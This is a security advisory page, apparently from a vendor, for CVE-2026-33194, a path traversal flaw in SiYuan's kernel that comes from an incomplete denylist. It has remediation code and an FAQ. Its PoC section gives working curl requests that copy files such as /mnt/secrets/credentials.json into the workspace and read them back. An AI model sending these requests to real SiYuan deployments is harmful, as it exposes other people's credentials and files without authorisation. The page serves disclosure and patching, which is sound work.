CVE-2026-33194

CVE-2026-33194 is a medium-severity path traversal vulnerability in github.com/siyuan-note/siyuan/kernel (go), affecting versions <= 3.6.1. It is fixed in 3.6.2.

Summary

The IsSensitivePath() function in kernel/util/path.go uses a denylist approach that was recently expanded (GHSA-h5vh-m7fg-w5h6, commit 9914fd1) but remains incomplete. Multiple security-relevant Linux directories are not blocked, including /opt (application data), /usr (local configs/binaries), /home (other users), /mnt and /media (mounted volumes). The globalCopyFiles and importStdMd endpoints rely on IsSensitivePath as their primary defense against reading files outside the workspace.

Details

Current denylist in kernel/util/path.go:391-405:

prefixes := []string{
    "/.",       // dotfiles
    "/etc",     // system config
    "/root",    // root home
    "/var",     // variable data
    "/proc",    // process info
    "/sys",     // sysfs
    "/run",     // runtime data
    "/bin",     // binaries
    "/boot",    // boot files
    "/dev",     // devices
    "/lib",     // libraries
    "/srv",     // service data
    "/tmp",     // temp files
}

NOT blocked:

  • /opt, commonly contains application data, databases, credentials. In SiYuan Docker, /opt/siyuan/ contains the application itself.
  • /usr, contains /usr/local/etc, /usr/local/share, custom configs
  • /home, other users' home directories (only ~/.ssh and ~/.config of the current HomeDir are blocked via separate checks, but other users' homes are accessible)
  • /mnt, /media, mounted volumes, network shares, often containing secrets
  • /snap, snap package data
  • /sbin, /lib64, system binaries/libraries

The globalCopyFiles endpoint at kernel/api/file.go:82 uses IsSensitivePath as its sole path validation:

if util.IsSensitivePath(absSrc) {
    // reject
    continue
}
// File is copied into workspace, then readable via /api/file/getFile

PoC

# Read SiYuan's own application files from /opt (Docker deployment)
curl -s 'http://127.0.0.1:6806/api/file/globalCopyFiles' \
  -H 'Authorization: Token YOUR_API_TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"srcs":["/opt/siyuan/kernel/SiYuan-Kernel"],"destDir":"data/assets"}'

# Then read the copied file from workspace
curl -s 'http://127.0.0.1:6806/api/file/getFile' \
  -H 'Authorization: Token YOUR_API_TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"path":"data/assets/SiYuan-Kernel"}'

# Read files from mounted volumes
curl -s 'http://127.0.0.1:6806/api/file/globalCopyFiles' \
  -H 'Authorization: Token YOUR_API_TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"srcs":["/mnt/secrets/credentials.json"],"destDir":"data/assets"}'

Impact

  • Read arbitrary files from /opt, /usr, /home, /mnt, /media and any other non-denylisted path
  • In Docker deployments: read application source code, configs, mounted secrets
  • The denylist approach is fundamentally flawed, any newly added filesystem path is accessible until explicitly blocked

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2026-33194 has a CVSS score of 6.8 (Medium). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.6.2); upgrading removes the vulnerable code path.

Affected versions

github.com/siyuan-note/siyuan/kernel (<= 3.6.1)

Security releases

github.com/siyuan-note/siyuan/kernel → 3.6.2 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Switch from a denylist to an allowlist approach. Only permit copying from the workspace directory and explicitly approved external paths:

func IsSensitivePath(p string) bool {
    absPath := filepath.Clean(p)

    // Allowlist: only workspace and configured safe directories
    if strings.HasPrefix(absPath, WorkspaceDir) {
        // Block workspace-internal sensitive paths (conf/)
        if strings.HasPrefix(absPath, filepath.Join(WorkspaceDir, "conf")) {
            return true
        }
        return false
    }

    // Everything outside workspace is sensitive by default
    return true
}

Frequently Asked Questions

  1. What is CVE-2026-33194? CVE-2026-33194 is a medium-severity path traversal vulnerability in github.com/siyuan-note/siyuan/kernel (go), affecting versions <= 3.6.1. It is fixed in 3.6.2. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-33194? CVE-2026-33194 has a CVSS score of 6.8 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/siyuan-note/siyuan/kernel are affected by CVE-2026-33194? github.com/siyuan-note/siyuan/kernel (go) versions <= 3.6.1 is affected.
  4. Is there a fix for CVE-2026-33194? Yes. CVE-2026-33194 is fixed in 3.6.2. Upgrade to this version or later.
  5. Is CVE-2026-33194 exploitable, and should I be worried? Whether CVE-2026-33194 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33194 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33194? Upgrade github.com/siyuan-note/siyuan/kernel to 3.6.2 or later.

Other vulnerabilities in github.com/siyuan-note/siyuan/kernel

CVE-2026-45375CVE-2026-45371CVE-2026-45148CVE-2026-45147CVE-2026-44588

Stop the waste.
Protect your environment with Kodem.